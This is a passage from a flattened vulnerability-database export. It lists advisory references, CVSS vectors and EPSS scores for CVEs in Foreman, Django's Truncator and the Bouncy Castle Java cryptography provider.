value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-16887
10
reference_url https://github.com/advisories/GHSA-mhhc-r88h-2qrm
reference_id GHSA-mhhc-r88h-2qrm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mhhc-r88h-2qrm
fixed_packages
aliases CVE-2018-16887, GHSA-mhhc-r88h-2qrm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ftzy-9uny-byfb
40
url VCID-hmcs-7s53-mbft
vulnerability_id VCID-hmcs-7s53-mbft
summary foreman: Recover of plaintext password or token for the compute resources
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-3893.json
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-3893.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-3893
reference_id
reference_type
scores
0
value 0.00377
scoring_system epss
scoring_elements 0.5913
published_at 2026-04-01T12:55:00Z
1
value 0.00377
scoring_system epss
scoring_elements 0.59242
published_at 2026-04-13T12:55:00Z
2
value 0.00377
scoring_system epss
scoring_elements 0.59258
published_at 2026-04-09T12:55:00Z
3
value 0.00377
scoring_system epss
scoring_elements 0.59277
published_at 2026-04-11T12:55:00Z
4
value 0.00377
scoring_system epss
scoring_elements 0.5926
published_at 2026-04-12T12:55:00Z
5
value 0.00377
scoring_system epss
scoring_elements 0.59204
published_at 2026-04-02T12:55:00Z
6
value 0.00377
scoring_system epss
scoring_elements 0.59227
published_at 2026-04-04T12:55:00Z
7
value 0.00377
scoring_system epss
scoring_elements 0.59192
published_at 2026-04-07T12:55:00Z
8
value 0.00377
scoring_system epss
scoring_elements 0.59244
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-3893
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3893
reference_id
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3893
3
reference_url https://github.com/theforeman/foreman/pull/6621
reference_id
reference_type
scores
url https://github.com/theforeman/foreman/pull/6621
4
reference_url https://projects.theforeman.org/issues/26450
reference_id
reference_type
scores
url https://projects.theforeman.org/issues/26450
5
reference_url http://www.openwall.com/lists/oss-security/2019/04/14/2
reference_id
reference_type
scores
url http://www.openwall.com/lists/oss-security/2019/04/14/2
6
reference_url http://www.securityfocus.com/bid/107846
reference_id
reference_type
scores
url http://www.securityfocus.com/bid/107846
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1696400
reference_id 1696400
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1696400
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite:6.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.0:*:*:*:*:*:*:*
9
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:theforeman:foreman:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:theforeman:foreman:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:theforeman:foreman:*:*:*:*:*:*:*:*
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-3893
reference_id CVE-2019-3893
reference_type
scores
0
value 4.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N
1
value 4.9
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
url https://nvd.nist.gov/vuln/detail/CVE-2019-3893
fixed_packages
aliases CVE-2019-3893
risk_score 2.2
exploitability 0.5
weighted_severity 4.4
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hmcs-7s53-mbft
41
url VCID-jae8-w85w-cyfu
vulnerability_id VCID-jae8-w85w-cyfu
summary An issue was discovered in Django 2.0 before 2.0.3, 1.11 before 1.11.11, and 1.8 before 1.8.19. If django.utils.text.Truncator's chars() and words() methods were passed the html=True argument, they were extremely slow to evaluate certain inputs due to a catastrophic backtracking vulnerability in a regular expression. The chars() and words() methods are used to implement the truncatechars_html and truncatewords_html template filters, which were thus vulnerable.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
1
reference_url https://access.redhat.com/errata/RHSA-2019:0265
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:0265
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-7537.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-7537.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-7537
reference_id
reference_type
scores
0
value 0.02064
scoring_system epss
scoring_elements 0.83885
published_at 2026-04-07T12:55:00Z
1
value 0.02064
scoring_system epss
scoring_elements 0.83884
published_at 2026-04-04T12:55:00Z
2
value 0.02064
scoring_system epss
scoring_elements 0.83915
published_at 2026-04-09T12:55:00Z
3
value 0.02064
scoring_system epss
scoring_elements 0.83854
published_at 2026-04-01T12:55:00Z
4
value 0.02064
scoring_system epss
scoring_elements 0.83922
published_at 2026-04-13T12:55:00Z
5
value 0.02064
scoring_system epss
scoring_elements 0.83926
published_at 2026-04-12T12:55:00Z
6
value 0.02064
scoring_system epss
scoring_elements 0.83932
published_at 2026-04-11T12:55:00Z
7
value 0.02064
scoring_system epss
scoring_elements 0.83868
published_at 2026-04-02T12:55:00Z
8
value 0.02064
scoring_system epss
scoring_elements 0.83909
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-7537
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7536
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7536
5
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7537
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7537
6
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
7
reference_url https://github.com/advisories/GHSA-2f9x-5v75-3qv4
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
3
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-2f9x-5v75-3qv4
8
reference_url https://github.com/django/django
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/django/django
9
reference_url https://github.com/django/django/commit/94c5da1d17a6b0d378866c66b605102c19f7988c
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/94c5da1d17a6b0d378866c66b605102c19f7988c
10
reference_url https://github.com/django/django/commit/a91436360b79a6ff995c3e5018bcc666dfaf1539
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/a91436360b79a6ff995c3e5018bcc666dfaf1539
11
reference_url https://github.com/django/django/commit/d17974a287a6ea2e361daff88fcc004cbd6835fa
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/django/django/commit/d17974a287a6ea2e361daff88fcc004cbd6835fa
12
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2018-6.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2018-6.yaml
13
reference_url https://lists.debian.org/debian-lts-announce/2018/03/msg00006.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/03/msg00006.html
14
reference_url https://usn.ubuntu.com/3591-1
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3591-1
15
reference_url https://usn.ubuntu.com/3591-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/3591-1/
16
reference_url https://www.debian.org/security/2018/dsa-4161
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2018/dsa-4161
17
reference_url https://www.djangoproject.com/weblog/2018/mar/06/security-releases
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://www.djangoproject.com/weblog/2018/mar/06/security-releases
18
reference_url https://www.djangoproject.com/weblog/2018/mar/06/security-releases/
reference_id
reference_type
scores
url https://www.djangoproject.com/weblog/2018/mar/06/security-releases/
19
reference_url http://www.securityfocus.com/bid/103357
reference_id
reference_type
scores
url http://www.securityfocus.com/bid/103357
20
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1549779
reference_id 1549779
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1549779
21
reference_url https://security.archlinux.org/ASA-201803-5
reference_id ASA-201803-5
reference_type
scores
url https://security.archlinux.org/ASA-201803-5
22
reference_url https://security.archlinux.org/AVG-649
reference_id AVG-649
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-649
23
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-7537
reference_id CVE-2018-7537
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 2.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-7537
fixed_packages
aliases CVE-2018-7537, GHSA-2f9x-5v75-3qv4, PYSEC-2018-6
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jae8-w85w-cyfu
42
url VCID-jr7u-m7gc-pydy
vulnerability_id VCID-jr7u-m7gc-pydy
summary In the Bouncy Castle JCE Provider version 1.55 and earlier the primary engine class used for AES was AESFastEngine. Due to the highly table driven approach used in the algorithm it turns out that if the data channel on the CPU can be monitored the lookup table accesses are sufficient to leak information on the AES key being used. There was also a leak in AESEngine although it was substantially less. AESEngine has been modified to remove any signs of leakage (testing carried out on Intel X86-64) and is now the primary AES class for the BC JCE provider from 1.56. Use of AESFastEngine is now only recommended where otherwise deemed appropriate.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000339.json
reference_id
reference_type
scores
0
value 5.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000339.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000339
reference_id
reference_type
scores
0
value 0.01119
scoring_system epss
scoring_elements 0.78226
published_at 2026-04-08T12:55:00Z
1
value 0.01119
scoring_system epss
scoring_elements 0.78236
published_at 2026-04-13T12:55:00Z
2
value 0.01119
scoring_system epss
scoring_elements 0.78241
published_at 2026-04-12T12:55:00Z
3
value 0.01119
scoring_system epss
scoring_elements 0.78258
published_at 2026-04-11T12:55:00Z
4
value 0.01119
scoring_system epss
scoring_elements 0.78232
published_at 2026-04-09T12:55:00Z
5
value 0.01119
scoring_system epss
scoring_elements 0.78178
published_at 2026-04-01T12:55:00Z
6
value 0.01119
scoring_system epss
scoring_elements 0.78187
published_at 2026-04-02T12:55:00Z
7
value 0.01119
scoring_system epss
scoring_elements 0.78217
published_at 2026-04-04T12:55:00Z
8
value 0.01119
scoring_system epss
scoring_elements 0.782
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000339
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000339
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000339
5
reference_url https://github.com/bcgit/bc-java/commit/413b42f4d770456508585c830cfcde95f9b0e93b
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/413b42f4d770456508585c830cfcde95f9b0e93b
6
reference_url https://github.com/bcgit/bc-java/commit/413b42f4d770456508585c830cfcde95f9b0e93b#diff-54656f860db94b867ba7542430cd2ef0
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/413b42f4d770456508585c830cfcde95f9b0e93b#diff-54656f860db94b867ba7542430cd2ef0
7
reference_url https://github.com/bcgit/bc-java/commit/8a73f08931450c17c749af067b6a8185abdfd2c0#diff-494fb066bed02aeb76b6c005632943f2
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/8a73f08931450c17c749af067b6a8185abdfd2c0#diff-494fb066bed02aeb76b6c005632943f2
8
reference_url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
9
reference_url https://security.netapp.com/advisory/ntap-20181127-0004
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181127-0004
10
reference_url https://security.netapp.com/advisory/ntap-20181127-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20181127-0004/
11
reference_url https://usn.ubuntu.com/3727-1
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3727-1
12
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588695
reference_id 1588695
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588695
14
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
15
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
16
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000339
reference_id CVE-2016-1000339
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:N/A:N
1
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000339
17
reference_url https://github.com/advisories/GHSA-c8xf-m4ff-jcxj
reference_id GHSA-c8xf-m4ff-jcxj
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-c8xf-m4ff-jcxj
18
reference_url https://usn.ubuntu.com/3727-1/
reference_id USN-3727-1
reference_type
scores
url https://usn.ubuntu.com/3727-1/
fixed_packages
aliases CVE-2016-1000339, GHSA-c8xf-m4ff-jcxj
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jr7u-m7gc-pydy
43
url VCID-jua2-2byr-t3cv
vulnerability_id VCID-jua2-2byr-t3cv
summary In Bouncy Castle JCE Provider version 1.55 and earlier the DSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000338.json
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000338.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000338
reference_id
reference_type
scores
0
value 0.00371
scoring_system epss
scoring_elements 0.58859
published_at 2026-04-07T12:55:00Z
1
value 0.00371
scoring_system epss
scoring_elements 0.5889
published_at 2026-04-04T12:55:00Z
2
value 0.00371
scoring_system epss
scoring_elements 0.58897
published_at 2026-04-13T12:55:00Z
3
value 0.00371
scoring_system epss
scoring_elements 0.58934
published_at 2026-04-11T12:55:00Z
4
value 0.00371
scoring_system epss
scoring_elements 0.58916
published_at 2026-04-12T12:55:00Z
5
value 0.00371
scoring_system epss
scoring_elements 0.5891
published_at 2026-04-08T12:55:00Z
6
value 0.00371
scoring_system epss
scoring_elements 0.58868
published_at 2026-04-02T12:55:00Z
7
value 0.00371
scoring_system epss
scoring_elements 0.58793
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000338
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000338
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000338
5
reference_url https://github.com/bcgit/bc-java
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java
6
reference_url https://github.com/bcgit/bc-java/commit/843c2e60f67d71faf81d236f448ebbe56c62c647
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/843c2e60f67d71faf81d236f448ebbe56c62c647
7
reference_url https://github.com/bcgit/bc-java/commit/b0c3ce99d43d73a096268831d0d120ffc89eac7f#diff-3679f5a9d2b939d0d3ee1601a7774fb0
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/b0c3ce99d43d73a096268831d0d120ffc89eac7f#diff-3679f5a9d2b939d0d3ee1601a7774fb0
8
reference_url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E
9
reference_url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E
10
reference_url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
11
reference_url https://security.netapp.com/advisory/ntap-20231006-0011
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20231006-0011
12
reference_url https://security.netapp.com/advisory/ntap-20231006-0011/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20231006-0011/
13
reference_url https://usn.ubuntu.com/3727-1
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3727-1
14
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588313
reference_id 1588313
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588313
16
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:legion-of-the-bouncy-castle-java-crytography-api:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:legion-of-the-bouncy-castle-java-crytography-api:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:legion-of-the-bouncy-castle-java-crytography-api:*:*:*:*:*:*:*:*
17
